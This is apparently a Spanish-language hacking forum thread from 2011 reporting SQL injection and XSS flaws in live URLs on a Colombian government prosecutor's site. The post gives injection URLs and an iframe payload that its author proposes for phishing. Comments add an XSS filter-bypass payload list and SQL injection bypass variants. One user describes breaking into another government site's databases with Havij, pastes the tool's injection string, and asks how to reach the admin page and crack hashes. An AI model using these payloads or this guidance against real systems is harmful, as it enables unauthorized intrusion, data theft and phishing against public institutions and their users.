error web www.fiscalia.gov.co

Publicado el 29/10/2011 12:10:00 en Bug Report.
Author: [x][x] Blizzacjk | Total de votos: 0   Vote



Host: www.fiscalia.gov.co
Autor: Blizzacjk
Reportado

dandome una vuelta por la web me encuentro con varios enlaces pero me llamo la atencion los enlaces por metodos GET les muestro el error

https://www.fiscalia.gov.co/justiciapaz/ProgramacionAudiencias.asp?d=16&m=2&a=2011'




otro error se encuentra en esta direccion

https://www.fiscalia.gov.co/justiciapaz/PagEmplazados.asp?ced=1066062176")



pero no solo SQL tambien nos encontramos con XSS


https://www.fiscalia.gov.co/justiciapaz/ProgramacionAudiencias.asp?d=16&m=2&a=<h1>codigo a inyectar</h1>



trate de explotar un alert pero no me funciono aunque con un poco de ingenio se podria hacer un iframe y esconder la url para phising

https://www.fiscalia.gov.co/justiciapaz/ProgramacionAudiencias.asp?d=16&m=2&a=<iframe src="https://br34ks3cur1ty.blogspot.com" width="800" height="60022>


Comments:


[x]
[x][x] MAZTOR (11 y) : 54968 Podias explotar el XSS al maximo saltando los filtros o con un Rjs Ej:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>.

no creo que le arreglen aun, esas vulnerabilidades son un poco viejas, pero has hecho muy bien con reportar.


[x]
[x][x] Blizzacjk (11 y) : 54970 :D gracias por esa explicacion


[x]
[x][x] lokolopsycho (11 y) : 54984 hola ami me pasa algo parecido con otra pagina del gobierno de mi pais para comprovar si era o no vulnerable al xss puse este code html en su url:
<h1>hola</h1> y me dio esto por resultado

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/apache/htdocs_http/OrdenJuridico/estatal.php on line 180

Notice: Undefined index:
Hola
in /usr/local/apache/htdocs_http/xxxxxxx/estatal.php on line 199

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=
Hola
ORDER BY C.idPoder asc' at line 5

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/apache/htdocs_http/xxxxxxx/estatal.php on line 270


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/apache/htdocs_http/xxxxxxx/estatal.php on line 272


por lo visto es vulnerable al sql pero, lo e inyectado con el code -1+union+all+select+1,,2,3,4,5,etc y nada alguien ke me orientara y me explicara como puedo acceder a la pagina ya accedi a las bases de datos por medio del havij pero kiero aprender manualmente

Gracias


[x]
[x][x] Blizzacjk (11 y) : 54986 pues te recomendaria comenzar por injecciones sql hay buenos blogs sobre eso,

http://l0ve.diosdelared.com/index.php?coment=11493

es un muy buen recopilatorio de sql suerte :)


[x]
[x][x] MichB (11 y) : 54990 estaba mirando el código de MAZTOR y probé a inyectarlo. ¿por que metiste tanto a la inyeccion si con esto <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> funciona bien?


[x]
[x][x] lokolopsycho (11 y) : 54991 oye me puedes explicar para que sirve ese scrip SAludos


[x]
[x][x] lokolopsycho (11 y) : 54992 con respecto al tutorial ya lo avia leido



[x]
[x][x] incid3nt (11 y) : 54993 MichB, Maztor no metio tanto código, proporciono diferentes códigos que pueden bypassear ciertos filtros.

Una SQL Injection por ejemplo puede bypassearse con:

id=1 and 1 = 2
id=1+and+1=2
id=-1 ...
id=1/**/1/**/and/**/1/**/=2

...etcétera.

¿Entendes?

Salu2


[x]
[x][x] lokolopsycho (11 y) : 54995 ya e intentado usar esos codes pero sin resultado el havij me dice:

Web Server: Apache/2.2.17 (Win32) PHP/5.2.10
Powered-by: PHP/5.2.10
Keyword Found: Dialoga
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 13
Valid String Column is 2
Current DB: wreportecdb
Injection Syntax: 999999.9' union all select 0x31303235343830303536,%String_Col%,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x



[x]
[x][x] lokolopsycho (11 y) : 54996 aveces uno de los mayores problemas es encontrar la pagina del administrador

o desencriptar el hash



[x]
[x][x] SIZZLAK (2 m) : 55854 puedo contactar con alguno de ustedes actualmente?? veo que los comentarios son antiguos. de poder hacerlo mi correo es [email protected]